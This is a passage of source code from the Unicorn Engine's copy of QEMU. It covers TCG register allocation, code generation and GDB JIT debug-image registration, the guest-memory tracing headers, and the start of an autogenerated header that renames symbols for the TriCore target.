def->sorted_args[nb_oargs + k]; arg = op->args[i]; arg_ct = &def->args_ct[i]; ts = arg_temp(arg); if (ts->val_type == TEMP_VAL_CONST && tcg_target_const_match(ts->val, ts->type, arg_ct)) { /* constant is OK for instruction */ const_args[i] = 1; new_args[i] = ts->val; continue; } i_preferred_regs = o_preferred_regs = 0; if (arg_ct->ct & TCG_CT_IALIAS) { o_preferred_regs = op->output_pref[arg_ct->alias_index]; if (ts->fixed_reg) { /* if fixed register, we must allocate a new register if the alias is not the same register */ if (arg != op->args[arg_ct->alias_index]) { goto allocate_in_reg; } } else { /* if the input is aliased to an output and if it is not dead after the instruction, we must allocate a new register and move it */ if (!IS_DEAD_ARG(i)) { goto allocate_in_reg; } /* check if the current register has already been allocated for another input aliased to an output */ if (ts->val_type == TEMP_VAL_REG) { int k2, i2; reg = ts->reg; for (k2 = 0 ; k2 < k ; k2++) { i2 = def->sorted_args[nb_oargs + k2]; if ((def->args_ct[i2].ct & TCG_CT_IALIAS) && reg == new_args[i2]) { goto allocate_in_reg; } } } i_preferred_regs = o_preferred_regs; } } temp_load(s, ts, arg_ct->u.regs, i_allocated_regs, i_preferred_regs); reg = ts->reg; if (tcg_regset_test_reg(arg_ct->u.regs, reg)) { /* nothing to do : the constraint is satisfied */ } else { allocate_in_reg: /* allocate a new register matching the constraint and move the temporary register into it */ temp_load(s, ts, s->tcg_target_available_regs[ts->type], i_allocated_regs, 0); reg = tcg_reg_alloc(s, arg_ct->u.regs, i_allocated_regs, o_preferred_regs, ts->indirect_base); if (!tcg_out_mov(s, ts->type, reg, ts->reg)) { /* * Cross register class move not supported. Sync the * temp back to its slot and load from there. */ temp_sync(s, ts, i_allocated_regs, 0, 0); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); } } new_args[i] = reg; const_args[i] = 0; tcg_regset_set_reg(i_allocated_regs, reg); } /* mark dead temporaries and free the associated registers */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { if (IS_DEAD_ARG(i)) { temp_dead(s, arg_temp(op->args[i])); } } if (def->flags & TCG_OPF_BB_END) { tcg_reg_alloc_bb_end(s, i_allocated_regs); } else { if (def->flags & TCG_OPF_CALL_CLOBBER) { /* XXX: permit generic clobber register list ? 
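For now every call-clobbered register is freed wholesale whenever an op carries TCG_OPF_CALL_CLOBBER; a per-opcode clobber list would let ops whose slow paths touch only a few registers keep the remainder live.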
*/ for (i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, i)) { tcg_reg_free(s, i, i_allocated_regs); } } } if (def->flags & TCG_OPF_SIDE_EFFECTS) { /* sync globals if the op has side effects and might trigger an exception. */ sync_globals(s, i_allocated_regs); } /* satisfy the output constraints */ for (k = 0; k < nb_oargs; k++) { i = def->sorted_args[k]; arg = op->args[i]; arg_ct = &def->args_ct[i]; ts = arg_temp(arg); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); if ((arg_ct->ct & TCG_CT_ALIAS) && !const_args[arg_ct->alias_index]) { reg = new_args[arg_ct->alias_index]; } else if (arg_ct->ct & TCG_CT_NEWREG) { reg = tcg_reg_alloc(s, arg_ct->u.regs, i_allocated_regs | o_allocated_regs, op->output_pref[k], ts->indirect_base); } else { reg = tcg_reg_alloc(s, arg_ct->u.regs, o_allocated_regs, op->output_pref[k], ts->indirect_base); } tcg_regset_set_reg(o_allocated_regs, reg); if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = TEMP_VAL_REG; ts->reg = reg; /* * Temp value is modified, so the value kept in memory is * potentially not the same. */ ts->mem_coherent = 0; s->reg_to_temp[reg] = ts; new_args[i] = reg; } } /* emit instruction */ if (def->flags & TCG_OPF_VECTOR) { tcg_out_vec_op(s, op->opc, TCGOP_VECL(op), TCGOP_VECE(op), new_args, const_args); } else { tcg_out_op(s, op->opc, new_args, const_args); } /* move the outputs into the correct registers if needed */ for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); if (NEED_SYNC_ARG(i)) { temp_sync(s, ts, o_allocated_regs, 0, IS_DEAD_ARG(i)); } else if (IS_DEAD_ARG(i)) { temp_dead(s, ts); } } } #ifdef TCG_TARGET_STACK_GROWSUP #define STACK_DIR(x) (-(x)) #else #define STACK_DIR(x) (x) #endif static void tcg_reg_alloc_call(TCGContext *s, TCGOp *op) { const int nb_oargs = TCGOP_CALLO(op); const int nb_iargs = TCGOP_CALLI(op); const TCGLifeData arg_life = op->life; int flags, nb_regs, i; TCGReg reg; TCGArg arg; TCGTemp *ts; intptr_t stack_offset; size_t call_stack_size; tcg_insn_unit *func_addr; int allocate_args; TCGRegSet allocated_regs; func_addr = (tcg_insn_unit *)(intptr_t)op->args[nb_oargs + nb_iargs]; flags = op->args[nb_oargs + nb_iargs + 1]; nb_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); #if TCG_TARGET_REG_BITS != 64 #ifdef _MSC_VER // do this because MSVC cannot have an array with 0 entries. /* ref: tcg/i386/tcg-target.inc.c: tcg_target_call_iarg_regs, a dummy value was added there, so set nb_regs back to 0.
*/ nb_regs = 0; #endif #endif if (nb_regs > nb_iargs) { nb_regs = nb_iargs; } /* assign stack slots first */ call_stack_size = (nb_iargs - nb_regs) * sizeof(tcg_target_long); call_stack_size = (call_stack_size + TCG_TARGET_STACK_ALIGN - 1) & ~(TCG_TARGET_STACK_ALIGN - 1); allocate_args = (call_stack_size > TCG_STATIC_CALL_ARGS_SIZE); if (allocate_args) { /* XXX: if more than TCG_STATIC_CALL_ARGS_SIZE is needed, preallocate call stack */ tcg_abort(); } stack_offset = TCG_TARGET_CALL_STACK_OFFSET; for (i = nb_regs; i < nb_iargs; i++) { arg = op->args[nb_oargs + i]; #ifdef TCG_TARGET_STACK_GROWSUP stack_offset -= sizeof(tcg_target_long); #endif if (arg != TCG_CALL_DUMMY_ARG) { ts = arg_temp(arg); temp_load(s, ts, s->tcg_target_available_regs[ts->type], s->reserved_regs, 0); tcg_out_st(s, ts->type, ts->reg, TCG_REG_CALL_STACK, stack_offset); } #ifndef TCG_TARGET_STACK_GROWSUP stack_offset += sizeof(tcg_target_long); #endif } /* assign input registers */ allocated_regs = s->reserved_regs; for (i = 0; i < nb_regs; i++) { arg = op->args[nb_oargs + i]; if (arg != TCG_CALL_DUMMY_ARG) { ts = arg_temp(arg); reg = tcg_target_call_iarg_regs[i]; if (ts->val_type == TEMP_VAL_REG) { if (ts->reg != reg) { tcg_reg_free(s, reg, allocated_regs); if (!tcg_out_mov(s, ts->type, reg, ts->reg)) { /* * Cross register class move not supported. Sync the * temp back to its slot and load from there. */ temp_sync(s, ts, allocated_regs, 0, 0); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); } } } else { TCGRegSet arg_set = 0; tcg_reg_free(s, reg, allocated_regs); tcg_regset_set_reg(arg_set, reg); temp_load(s, ts, arg_set, allocated_regs, 0); } tcg_regset_set_reg(allocated_regs, reg); } } /* mark dead temporaries and free the associated registers */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { if (IS_DEAD_ARG(i)) { temp_dead(s, arg_temp(op->args[i])); } } /* clobber call registers */ for (i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, i)) { tcg_reg_free(s, i, allocated_regs); } } /* Save globals if they might be written by the helper, sync them if they might be read. */ if (flags & TCG_CALL_NO_READ_GLOBALS) { /* Nothing to do */ } else if (flags & TCG_CALL_NO_WRITE_GLOBALS) { sync_globals(s, allocated_regs); } else { save_globals(s, allocated_regs); } tcg_out_call(s, func_addr); /* assign output registers and emit moves if needed */ for(i = 0; i < nb_oargs; i++) { arg = op->args[i]; ts = arg_temp(arg); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); reg = tcg_target_call_oarg_regs[i]; tcg_debug_assert(s->reg_to_temp[reg] == NULL); if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = TEMP_VAL_REG; ts->reg = reg; ts->mem_coherent = 0; s->reg_to_temp[reg] = ts; if (NEED_SYNC_ARG(i)) { temp_sync(s, ts, allocated_regs, 0, IS_DEAD_ARG(i)); } else if (IS_DEAD_ARG(i)) { temp_dead(s, ts); } } } int64_t tcg_cpu_exec_time(void) { // error_report("%s: TCG profiler not compiled", __func__); exit(EXIT_FAILURE); } int tcg_gen_code(TCGContext *s, TranslationBlock *tb) { int i, num_insns; TCGOp *op; #ifndef NDEBUG if (is_log_level_active(CPU_LOG_TB_IN_ASM)) { tcg_dump_ops(s, false, "TCG before optimization:"); } #endif #ifdef CONFIG_DEBUG_TCG /* Ensure all labels referenced have been emitted. 
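   A label is created by gen_new_label(); it becomes "referenced" once a
   branch op uses it (l->refs > 0) and "present" once gen_set_label()
   emits it.  A referenced label that is never emitted would leave an
   unresolvable relocation, which the walk below asserts against.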
*/ { TCGLabel *l; bool error = false; QSIMPLEQ_FOREACH(l, &s->labels, next) { if (unlikely(!l->present) && l->refs) { error = true; } } assert(!error); } #endif #ifdef USE_TCG_OPTIMIZATIONS tcg_optimize(s); #endif //tcg_dump_ops(s, false, "after opt1:"); reachable_code_pass(s); //tcg_dump_ops(s, false, "after opt2:"); liveness_pass_1(s); //tcg_dump_ops(s, false, "after opt3:"); if (s->nb_indirects > 0) { /* Replace indirect temps with direct temps. */ if (liveness_pass_2(s)) { /* If changes were made, re-run liveness. */ liveness_pass_1(s); } } //tcg_dump_ops(s, false, "after opt4:"); tcg_reg_alloc_start(s); s->code_buf = tb->tc.ptr; s->code_ptr = tb->tc.ptr; #ifdef TCG_TARGET_NEED_LDST_LABELS QSIMPLEQ_INIT(&s->ldst_labels); #endif #ifdef TCG_TARGET_NEED_POOL_LABELS s->pool_labels = NULL; #endif #ifndef NDEBUG if (is_log_level_active(CPU_LOG_TB_IN_ASM)) { tcg_dump_ops(s, false, "TCG before codegen:"); } #endif num_insns = -1; QTAILQ_FOREACH(op, &s->ops, link) { TCGOpcode opc = op->opc; switch (opc) { case INDEX_op_mov_i32: case INDEX_op_mov_i64: case INDEX_op_mov_vec: tcg_reg_alloc_mov(s, op); break; case INDEX_op_movi_i32: case INDEX_op_movi_i64: case INDEX_op_dupi_vec: tcg_reg_alloc_movi(s, op); break; case INDEX_op_dup_vec: tcg_reg_alloc_dup(s, op); break; case INDEX_op_insn_start: if (num_insns >= 0) { size_t off = tcg_current_code_size(s); s->gen_insn_end_off[num_insns] = off; /* Assert that we do not overflow our stored offset. */ assert(s->gen_insn_end_off[num_insns] == off); } num_insns++; for (i = 0; i < TARGET_INSN_START_WORDS; ++i) { target_ulong a; #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS a = deposit64(op->args[i * 2], 32, 32, op->args[i * 2 + 1]); #else a = op->args[i]; #endif s->gen_insn_data[num_insns][i] = a; } break; case INDEX_op_discard: temp_dead(s, arg_temp(op->args[0])); break; case INDEX_op_set_label: tcg_reg_alloc_bb_end(s, s->reserved_regs); tcg_out_label(s, arg_label(op->args[0]), s->code_ptr); break; case INDEX_op_call: tcg_reg_alloc_call(s, op); break; default: /* Sanity check that we've not introduced any unhandled opcodes. */ tcg_debug_assert(tcg_op_supported(opc)); /* Note: in order to speed up the code, it would be much faster to have specialized register allocator functions for some common argument patterns */ tcg_reg_alloc_op(s, op); break; } #ifdef CONFIG_DEBUG_TCG check_regs(s); #endif /* Test for (pending) buffer overflow. The assumption is that any one operation beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after generating code without having to check during generation. */ if (unlikely((void *)s->code_ptr > s->code_gen_highwater)) { return -1; } /* Test for TB overflow, as seen by gen_insn_end_off. */ if (unlikely(tcg_current_code_size(s) > UINT16_MAX)) { return -2; } } tcg_debug_assert(num_insns >= 0); s->gen_insn_end_off[num_insns] = tcg_current_code_size(s); /* Generate TB finalization at the end of block */ #ifdef TCG_TARGET_NEED_LDST_LABELS i = tcg_out_ldst_finalize(s); if (i < 0) { return i; } #endif #ifdef TCG_TARGET_NEED_POOL_LABELS i = tcg_out_pool_finalize(s); if (i < 0) { return i; } #endif if (!tcg_resolve_relocs(s)) { return -2; } /* flush instruction cache */ flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); return tcg_current_code_size(s); } #ifdef ELF_HOST_MACHINE /* In order to use this feature, the backend needs to do three things: (1) Define ELF_HOST_MACHINE to indicate both what value to put into the ELF image and to indicate support for the feature. 
(2) Define tcg_register_jit. This should create a buffer containing the contents of a .debug_frame section that describes the post- prologue unwind info for the tcg machine. (3) Call tcg_register_jit_int, with the constructed .debug_frame. */ /* Begin GDB interface. THE FOLLOWING MUST MATCH GDB DOCS. */ typedef enum { JIT_NOACTION = 0, JIT_REGISTER_FN, JIT_UNREGISTER_FN } jit_actions_t; struct jit_descriptor { uint32_t version; uint32_t action_flag; struct jit_code_entry *relevant_entry; struct jit_code_entry *first_entry; }; #if 0 void __jit_debug_register_code(void) QEMU_NOINLINE; void __jit_debug_register_code(void) { asm(""); } /* Must statically initialize the version, because GDB may check the version before we can set it. */ struct jit_descriptor __jit_debug_descriptor = { 1, 0, 0, 0 }; #endif /* End GDB interface. */ static int find_string(const char *strtab, const char *str) { const char *p = strtab + 1; while (1) { if (strcmp(p, str) == 0) { return p - strtab; } p += strlen(p) + 1; } } static void tcg_register_jit_int(TCGContext *s, void *buf_ptr, size_t buf_size, const void *debug_frame, size_t debug_frame_size) { struct __attribute__((packed)) DebugInfo { uint32_t len; uint16_t version; uint32_t abbrev; uint8_t ptr_size; uint8_t cu_die; uint16_t cu_lang; uintptr_t cu_low_pc; uintptr_t cu_high_pc; uint8_t fn_die; char fn_name[16]; uintptr_t fn_low_pc; uintptr_t fn_high_pc; uint8_t cu_eoc; }; struct ElfImage { ElfW(Ehdr) ehdr; ElfW(Phdr) phdr; ElfW(Shdr) shdr[7]; ElfW(Sym) sym[2]; struct DebugInfo di; uint8_t da[24]; char str[80]; }; struct ElfImage *img; static const struct ElfImage img_template = { .ehdr = { .e_ident[EI_MAG0] = ELFMAG0, .e_ident[EI_MAG1] = ELFMAG1, .e_ident[EI_MAG2] = ELFMAG2, .e_ident[EI_MAG3] = ELFMAG3, .e_ident[EI_CLASS] = ELF_CLASS, .e_ident[EI_DATA] = ELF_DATA, .e_ident[EI_VERSION] = EV_CURRENT, .e_type = ET_EXEC, .e_machine = ELF_HOST_MACHINE, .e_version = EV_CURRENT, .e_phoff = offsetof(struct ElfImage, phdr), .e_shoff = offsetof(struct ElfImage, shdr), .e_ehsize = sizeof(ElfW(Shdr)), .e_phentsize = sizeof(ElfW(Phdr)), .e_phnum = 1, .e_shentsize = sizeof(ElfW(Shdr)), .e_shnum = ARRAY_SIZE(img->shdr), .e_shstrndx = ARRAY_SIZE(img->shdr) - 1, #ifdef ELF_HOST_FLAGS .e_flags = ELF_HOST_FLAGS, #endif #ifdef ELF_OSABI .e_ident[EI_OSABI] = ELF_OSABI, #endif }, .phdr = { .p_type = PT_LOAD, .p_flags = PF_X, }, .shdr = { [0] = { .sh_type = SHT_NULL }, /* Trick: The contents of code_gen_buffer are not present in this fake ELF file; that got allocated elsewhere. Therefore we mark .text as SHT_NOBITS (similar to .bss) so that readers will not look for contents. We can record any address. 
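   For orientation (summarizing the initializers below): the section
   table has seven entries -- [0] SHT_NULL, [1] .text (SHT_NOBITS),
   [2] .debug_info, [3] .debug_abbrev, [4] .debug_frame, [5] .symtab,
   [6] .strtab -- matching ARRAY_SIZE(img->shdr) and the e_shstrndx
   chosen above.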
*/ [1] = { /* .text */ .sh_type = SHT_NOBITS, .sh_flags = SHF_EXECINSTR | SHF_ALLOC, }, [2] = { /* .debug_info */ .sh_type = SHT_PROGBITS, .sh_offset = offsetof(struct ElfImage, di), .sh_size = sizeof(struct DebugInfo), }, [3] = { /* .debug_abbrev */ .sh_type = SHT_PROGBITS, .sh_offset = offsetof(struct ElfImage, da), .sh_size = sizeof(img->da), }, [4] = { /* .debug_frame */ .sh_type = SHT_PROGBITS, .sh_offset = sizeof(struct ElfImage), }, [5] = { /* .symtab */ .sh_type = SHT_SYMTAB, .sh_offset = offsetof(struct ElfImage, sym), .sh_size = sizeof(img->sym), .sh_info = 1, .sh_link = ARRAY_SIZE(img->shdr) - 1, .sh_entsize = sizeof(ElfW(Sym)), }, [6] = { /* .strtab */ .sh_type = SHT_STRTAB, .sh_offset = offsetof(struct ElfImage, str), .sh_size = sizeof(img->str), } }, .sym = { [1] = { /* code_gen_buffer */ .st_info = ELF_ST_INFO(STB_GLOBAL, STT_FUNC), .st_shndx = 1, } }, .di = { .len = sizeof(struct DebugInfo) - 4, .version = 2, .ptr_size = sizeof(void *), .cu_die = 1, .cu_lang = 0x8001, /* DW_LANG_Mips_Assembler */ .fn_die = 2, .fn_name = "code_gen_buffer" }, .da = { 1, /* abbrev number (the cu) */ 0x11, 1, /* DW_TAG_compile_unit, has children */ 0x13, 0x5, /* DW_AT_language, DW_FORM_data2 */ 0x11, 0x1, /* DW_AT_low_pc, DW_FORM_addr */ 0x12, 0x1, /* DW_AT_high_pc, DW_FORM_addr */ 0, 0, /* end of abbrev */ 2, /* abbrev number (the fn) */ 0x2e, 0, /* DW_TAG_subprogram, no children */ 0x3, 0x8, /* DW_AT_name, DW_FORM_string */ 0x11, 0x1, /* DW_AT_low_pc, DW_FORM_addr */ 0x12, 0x1, /* DW_AT_high_pc, DW_FORM_addr */ 0, 0, /* end of abbrev */ 0 /* no more abbrev */ }, .str = "\0" ".text\0" ".debug_info\0" ".debug_abbrev\0" ".debug_frame\0" ".symtab\0" ".strtab\0" "code_gen_buffer", }; uintptr_t buf = (uintptr_t)buf_ptr; size_t img_size = sizeof(struct ElfImage) + debug_frame_size; DebugFrameHeader *dfh; img = g_malloc(img_size); *img = img_template; img->phdr.p_vaddr = buf; img->phdr.p_paddr = buf; img->phdr.p_memsz = buf_size; img->shdr[1].sh_name = find_string(img->str, ".text"); img->shdr[1].sh_addr = buf; img->shdr[1].sh_size = buf_size; img->shdr[2].sh_name = find_string(img->str, ".debug_info"); img->shdr[3].sh_name = find_string(img->str, ".debug_abbrev"); img->shdr[4].sh_name = find_string(img->str, ".debug_frame"); img->shdr[4].sh_size = debug_frame_size; img->shdr[5].sh_name = find_string(img->str, ".symtab"); img->shdr[6].sh_name = find_string(img->str, ".strtab"); img->sym[1].st_name = find_string(img->str, "code_gen_buffer"); img->sym[1].st_value = buf; img->sym[1].st_size = buf_size; img->di.cu_low_pc = buf; img->di.cu_high_pc = buf + buf_size; img->di.fn_low_pc = buf; img->di.fn_high_pc = buf + buf_size; dfh = (DebugFrameHeader *)(img + 1); memcpy(dfh, debug_frame, debug_frame_size); dfh->fde.func_start = buf; dfh->fde.func_len = buf_size; #ifdef DEBUG_JIT /* Enable this block to be able to debug the ELF image file creation. One can use readelf, objdump, or other inspection utilities. */ { FILE *f = fopen("/tmp/qemu.jit", "w+b"); if (f) { if (fwrite(img, img_size, 1, f) != img_size) { /* Avoid stupid unused return value warning for fwrite. */ } fclose(f); } } #endif s->one_entry->symfile_addr = img; s->one_entry->symfile_size = img_size; #if 0 __jit_debug_descriptor.action_flag = JIT_REGISTER_FN; __jit_debug_descriptor.relevant_entry = s->one_entry; __jit_debug_descriptor.first_entry = s->one_entry; __jit_debug_register_code(); #endif } #else /* No support for the feature. Provide the entry point expected by exec.c, and implement the internal function we declared earlier. 
*/
static void tcg_register_jit_int(TCGContext *s, void *buf, size_t size,
                                 const void *debug_frame,
                                 size_t debug_frame_size)
{
}

void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size)
{
}
#endif /* ELF_HOST_MACHINE */

#if !TCG_TARGET_MAYBE_vec
void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode o, TCGType t, unsigned e,
                       TCGArg a0, ...)
{
    g_assert_not_reached();
}
#endif

unicorn-2.1.1/qemu/trace/mem-internal.h

/*
 * Helper functions for guest memory tracing
 *
 * Copyright (C) 2016 Lluís Vilanova <vilanova@ac.upc.edu>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef TRACE__MEM_INTERNAL_H
#define TRACE__MEM_INTERNAL_H

#define TRACE_MEM_SZ_SHIFT_MASK 0xf    /* size shift mask */
#define TRACE_MEM_SE (1ULL << 4)       /* sign extended (y/n) */
#define TRACE_MEM_BE (1ULL << 5)       /* big endian (y/n) */
#define TRACE_MEM_ST (1ULL << 6)       /* store (y/n) */
#define TRACE_MEM_MMU_SHIFT 8          /* mmu idx */

static inline uint16_t trace_mem_build_info(
    int size_shift, bool sign_extend, MemOp endianness, bool store,
    unsigned int mmu_idx)
{
    uint16_t res;

    res = size_shift & TRACE_MEM_SZ_SHIFT_MASK;
    if (sign_extend) {
        res |= TRACE_MEM_SE;
    }
    if (endianness == MO_BE) {
        res |= TRACE_MEM_BE;
    }
    if (store) {
        res |= TRACE_MEM_ST;
    }
#ifdef CONFIG_SOFTMMU
    res |= mmu_idx << TRACE_MEM_MMU_SHIFT;
#endif
    return res;
}

static inline uint16_t trace_mem_get_info(MemOp op,
                                          unsigned int mmu_idx,
                                          bool store)
{
    return trace_mem_build_info(op & MO_SIZE, !!(op & MO_SIGN),
                                op & MO_BSWAP, store, mmu_idx);
}

#endif /* TRACE__MEM_INTERNAL_H */

unicorn-2.1.1/qemu/trace/mem.h

/*
 * Helper functions for guest memory tracing
 *
 * Copyright (C) 2016 Lluís Vilanova <vilanova@ac.upc.edu>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef TRACE__MEM_H
#define TRACE__MEM_H

#include "tcg/tcg.h"

/**
 * trace_mem_get_info:
 *
 * Return a value for the 'info' argument in guest memory access traces.
 */
static uint16_t trace_mem_get_info(MemOp op, unsigned int mmu_idx, bool store);

/**
 * trace_mem_build_info:
 *
 * Return a value for the 'info' argument in guest memory access traces.
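 *
 * Illustrative layout (derived from the masks in mem-internal.h):
 * bits [3:0] hold the size shift, bit 4 sign-extension, bit 5 big
 * endianness, bit 6 store/load, and bits [15:8] the mmu index under
 * CONFIG_SOFTMMU.  For example, a 4-byte big-endian store (size shift
 * 2) without softmmu packs to 0x62.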
 */
static uint16_t trace_mem_build_info(int size_shift, bool sign_extend,
                                     MemOp endianness, bool store,
                                     unsigned int mmu_idx);

#include "mem-internal.h"

#endif /* TRACE__MEM_H */

unicorn-2.1.1/qemu/tricore.h

/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_tricore_H
#define UNICORN_AUTOGEN_tricore_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _tricore
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_tricore
#define reg_read reg_read_tricore
#define reg_write reg_write_tricore
#define uc_init uc_init_tricore
#define uc_add_inline_hook uc_add_inline_hook_tricore
#define uc_del_inline_hook uc_del_inline_hook_tricore
#define tb_invalidate_phys_range tb_invalidate_phys_range_tricore
#define use_idiv_instructions use_idiv_instructions_tricore
#define arm_arch arm_arch_tricore
#define tb_target_set_jmp_target tb_target_set_jmp_target_tricore
#define have_bmi1 have_bmi1_tricore
#define have_popcnt have_popcnt_tricore
#define have_avx1 have_avx1_tricore
#define have_avx2 have_avx2_tricore
#define have_isa have_isa_tricore
#define have_altivec have_altivec_tricore
#define have_vsx have_vsx_tricore
#define flush_icache_range flush_icache_range_tricore
#define s390_facilities s390_facilities_tricore
#define tcg_dump_op tcg_dump_op_tricore
#define tcg_dump_ops tcg_dump_ops_tricore
#define tcg_gen_and_i64 tcg_gen_and_i64_tricore
#define tcg_gen_discard_i64 tcg_gen_discard_i64_tricore
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_tricore
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_tricore
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_tricore
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_tricore
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_tricore
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_tricore
#define tcg_gen_ld_i64 tcg_gen_ld_i64_tricore
#define tcg_gen_mov_i64 tcg_gen_mov_i64_tricore
#define tcg_gen_movi_i64 tcg_gen_movi_i64_tricore
#define tcg_gen_mul_i64 tcg_gen_mul_i64_tricore
#define tcg_gen_or_i64 tcg_gen_or_i64_tricore
#define tcg_gen_sar_i64 tcg_gen_sar_i64_tricore
#define tcg_gen_shl_i64 tcg_gen_shl_i64_tricore
#define tcg_gen_shr_i64 tcg_gen_shr_i64_tricore
#define tcg_gen_st_i64 tcg_gen_st_i64_tricore
#define tcg_gen_xor_i64 tcg_gen_xor_i64_tricore
#define cpu_icount_to_ns cpu_icount_to_ns_tricore
#define cpu_is_stopped cpu_is_stopped_tricore
#define cpu_get_ticks cpu_get_ticks_tricore
#define cpu_get_clock cpu_get_clock_tricore
#define cpu_resume cpu_resume_tricore
#define qemu_init_vcpu qemu_init_vcpu_tricore
#define cpu_stop_current cpu_stop_current_tricore
#define resume_all_vcpus resume_all_vcpus_tricore
#define vm_start vm_start_tricore
#define address_space_dispatch_compact address_space_dispatch_compact_tricore
#define flatview_translate flatview_translate_tricore
#define address_space_translate_for_iotlb address_space_translate_for_iotlb_tricore
#define qemu_get_cpu qemu_get_cpu_tricore
#define cpu_address_space_init
cpu_address_space_init_tricore #define cpu_get_address_space cpu_get_address_space_tricore #define cpu_exec_unrealizefn cpu_exec_unrealizefn_tricore #define cpu_exec_initfn cpu_exec_initfn_tricore #define cpu_exec_realizefn cpu_exec_realizefn_tricore #define tb_invalidate_phys_addr tb_invalidate_phys_addr_tricore #define cpu_watchpoint_insert cpu_watchpoint_insert_tricore #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_tricore #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_tricore #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_tricore #define cpu_breakpoint_insert cpu_breakpoint_insert_tricore #define cpu_breakpoint_remove cpu_breakpoint_remove_tricore #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_tricore #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_tricore #define cpu_abort cpu_abort_tricore #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_tricore #define memory_region_section_get_iotlb memory_region_section_get_iotlb_tricore #define flatview_add_to_dispatch flatview_add_to_dispatch_tricore #define qemu_ram_get_host_addr qemu_ram_get_host_addr_tricore #define qemu_ram_get_offset qemu_ram_get_offset_tricore #define qemu_ram_get_used_length qemu_ram_get_used_length_tricore #define qemu_ram_is_shared qemu_ram_is_shared_tricore #define qemu_ram_pagesize qemu_ram_pagesize_tricore #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_tricore #define qemu_ram_alloc qemu_ram_alloc_tricore #define qemu_ram_free qemu_ram_free_tricore #define qemu_map_ram_ptr qemu_map_ram_ptr_tricore #define qemu_ram_block_host_offset qemu_ram_block_host_offset_tricore #define qemu_ram_block_from_host qemu_ram_block_from_host_tricore #define qemu_ram_addr_from_host qemu_ram_addr_from_host_tricore #define cpu_check_watchpoint cpu_check_watchpoint_tricore #define iotlb_to_section iotlb_to_section_tricore #define address_space_dispatch_new address_space_dispatch_new_tricore #define address_space_dispatch_free address_space_dispatch_free_tricore #define flatview_read_continue flatview_read_continue_tricore #define address_space_read_full address_space_read_full_tricore #define address_space_write address_space_write_tricore #define address_space_rw address_space_rw_tricore #define cpu_physical_memory_rw cpu_physical_memory_rw_tricore #define address_space_write_rom address_space_write_rom_tricore #define cpu_flush_icache_range cpu_flush_icache_range_tricore #define cpu_exec_init_all cpu_exec_init_all_tricore #define address_space_access_valid address_space_access_valid_tricore #define address_space_map address_space_map_tricore #define address_space_unmap address_space_unmap_tricore #define cpu_physical_memory_map cpu_physical_memory_map_tricore #define cpu_physical_memory_unmap cpu_physical_memory_unmap_tricore #define cpu_memory_rw_debug cpu_memory_rw_debug_tricore #define qemu_target_page_size qemu_target_page_size_tricore #define qemu_target_page_bits qemu_target_page_bits_tricore #define qemu_target_page_bits_min qemu_target_page_bits_min_tricore #define target_words_bigendian target_words_bigendian_tricore #define cpu_physical_memory_is_io cpu_physical_memory_is_io_tricore #define ram_block_discard_range ram_block_discard_range_tricore #define ramblock_is_pmem ramblock_is_pmem_tricore #define page_size_init page_size_init_tricore #define set_preferred_target_page_bits set_preferred_target_page_bits_tricore #define finalize_target_page_bits finalize_target_page_bits_tricore #define 
cpu_outb cpu_outb_tricore #define cpu_outw cpu_outw_tricore #define cpu_outl cpu_outl_tricore #define cpu_inb cpu_inb_tricore #define cpu_inw cpu_inw_tricore #define cpu_inl cpu_inl_tricore #define memory_map memory_map_tricore #define memory_map_io memory_map_io_tricore #define memory_map_ptr memory_map_ptr_tricore #define memory_cow memory_cow_tricore #define memory_unmap memory_unmap_tricore #define memory_moveout memory_moveout_tricore #define memory_movein memory_movein_tricore #define memory_free memory_free_tricore #define flatview_unref flatview_unref_tricore #define address_space_get_flatview address_space_get_flatview_tricore #define memory_region_transaction_begin memory_region_transaction_begin_tricore #define memory_region_transaction_commit memory_region_transaction_commit_tricore #define memory_region_init memory_region_init_tricore #define memory_region_access_valid memory_region_access_valid_tricore #define memory_region_dispatch_read memory_region_dispatch_read_tricore #define memory_region_dispatch_write memory_region_dispatch_write_tricore #define memory_region_init_io memory_region_init_io_tricore #define memory_region_init_ram_ptr memory_region_init_ram_ptr_tricore #define memory_region_size 